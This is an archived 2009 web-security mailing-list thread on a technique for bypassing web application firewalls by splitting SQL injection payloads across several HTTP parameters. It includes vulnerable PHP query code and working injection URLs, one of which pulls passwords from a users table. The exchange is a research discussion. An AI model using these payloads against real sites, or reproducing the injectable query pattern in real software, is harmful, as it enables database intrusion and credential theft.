[WEB SECURITY] HTTP parameters fragmentation

Steve Pinkham steve.pinkham at gmail.com
Wed Aug 19 16:30:21 EDT 2009


I agree. If it's two different parameters, it's not quite the same as 
HPP.  Somehow glanced over that detail ;-) On the other hand, some of 
the effects of HPP are similar to what you describe.

It's not really a novel technique, I've used it in the past to get 
around XSS filters,  but I'm at a loss for a definitive place to point 
for documentation on the issue.
Anyone?

Steve
lavakumar kuppan wrote:
> Not really.
> When multiple parameters of the same name are sent in a single request, 
> different web technologies(ASP,ASP.NET <http://ASP.NET>, Java, Python, 
> Perl, PHP etc) handle it differently.
> This is a problem with the implementation of the HTTP protocol on these 
> technologies. This is what HPP deals with.
> 
> And when it comes to WAF bypass with HPP, the problem is the failure of 
> WAF to mimic the server technology's HTTP implementation, causing 
> an impedance mismatch.
> 
> 
> Dmitriy's method does not exploit impedance mismatch or weakness of the 
> HTTP implementaion.
> Instead it is a clever way to exploit a specific type of SQL injection 
> vulnerability(involving two vulnerable parameters in the same query) by 
> splitting the payload so that it cannot be filtered by the WAF but can 
> still be executed by the server.
> 
> Though superficially the two techniques appear to be similar, they are 
> exploiting weaknesses in two different areas.
> The user of inline-comments to join the parts of the payload is what is 
> common here.
> 
> This would classify as payload obfuscation IMHO
> 
> Cheers,
> Lava
> http://www.lavakumar.com
> 
> On Thu, Aug 20, 2009 at 12:29 AM, Prasad Shenoy <prasad.shenoy at gmail.com 
> <mailto:prasad.shenoy at gmail.com>> wrote:
> 
>     Steve Pinkham nailed it I guess. It is a form of HPP? No?
>      
>     P. N. Shenoy
> 
>     On Wed, Aug 19, 2009 at 1:02 PM, lavakumar kuppan <lavakumar.in
>     <http://lavakumar.in>@gmail.com <http://gmail.com>> wrote:
> 
>         Hi Dmitriy,
> 
>         That is very interesting. It very closely resembles the
>         ModSecurity Filter Bypass that I had discovered sometime back.
>         There is just one small difference, I was using the same
>         parameter multiple times(HTTP Parameter Pollution) while you are
>         using multiple parameters, nice trick!
> 
>         I had written a whitepaper on the same, you can find it at
>         http://lavakumar.com/Split_and_Join.pdf
>         The ModSecurity advisory is at
>         http://lavakumar.com/modsecurity_hpp.txt
> 
>         You can find more information about HPP
>         at http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
> 
>         Hope this helps.
> 
>         Cheers,
>         Lava
>         http://www.lavakumar.com <http://www.lavakumar.com/>
> 
> 
>         2009/8/19 Dmitriy Evteev <devteev at ptsecurity.com
>         <mailto:devteev at ptsecurity.com>>:
> 
>          > While preparing an article about WAF bypassing methods, I
>         found an
>          > interesting way to bypass filters via HTTP parameters
>         fragmentation.
>          >
>          >  
>          >
>          > Vulnerable code example
>          >
>          > Query("select * from table where a=".$_GET['a']." and
>         b=".$_GET['b']);
>          >
>          >  
>          >
>          > The following request doesn’t allow to conduct an attack
>          >
>          > index.php?a=1+union+select+1,2/*
>          >
>          >  
>          >
>          > The following request’s succeeded using HPF
>          >
>          > index.php?a=1+union/*&b=*/select+1,2
>          >
>          >  
>          >
>          > In the case, SQL request looks like
>          >
>          > select * from table where a=1 union/* and b=*/select 1,2
>          >
>          >  
>          >
>          > Another example:
>          >
>          > Query("select * from table where a=".$_GET['a']." and
>         b=".$_GET['b']." limit
>          > ".$_GET['c']);
>          >
>          > Query("select * from table where a=".$_GET['a']." and
>         b=".$_GET['b']." order
>          > by ".$_GET['c']." limit 1");
>          >
>          >  
>          >
>          > Using HPF (HTTP Parameter Fragmentation), the request’s
>         succeeded:
>          >
>          > index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--
>          >
>          >  
>          >
>          > The question is: is there any name for the technique? Please,
>         advise me if
>          > you know articles or experts in  the field (for example, I
>         found a reference
>          > in
>          >
>         http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf,
>          > page 79).
>          >
>          > Thank you for help and cooperation in advance!
>          >
>          >  
>          >
>          > - - - - - - - - - - - - - - -
>          > Best Regards, Dmitry Evteev
>          > Positive Technologies Co.
>          > Tel.: (495) 744-0144
>          > Web: http://www.ptsecurity.ru <http://www.ptsecurity.ru/>
>          >
>          >  
> 
> 
> 


-- 
  | Steven E. Pinkham                      |
  | Security Researcher, Maven Security    |
  | steve.pinkham at mavensecurity.com        |
  | GPG public key ID CD31CAFB             |

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list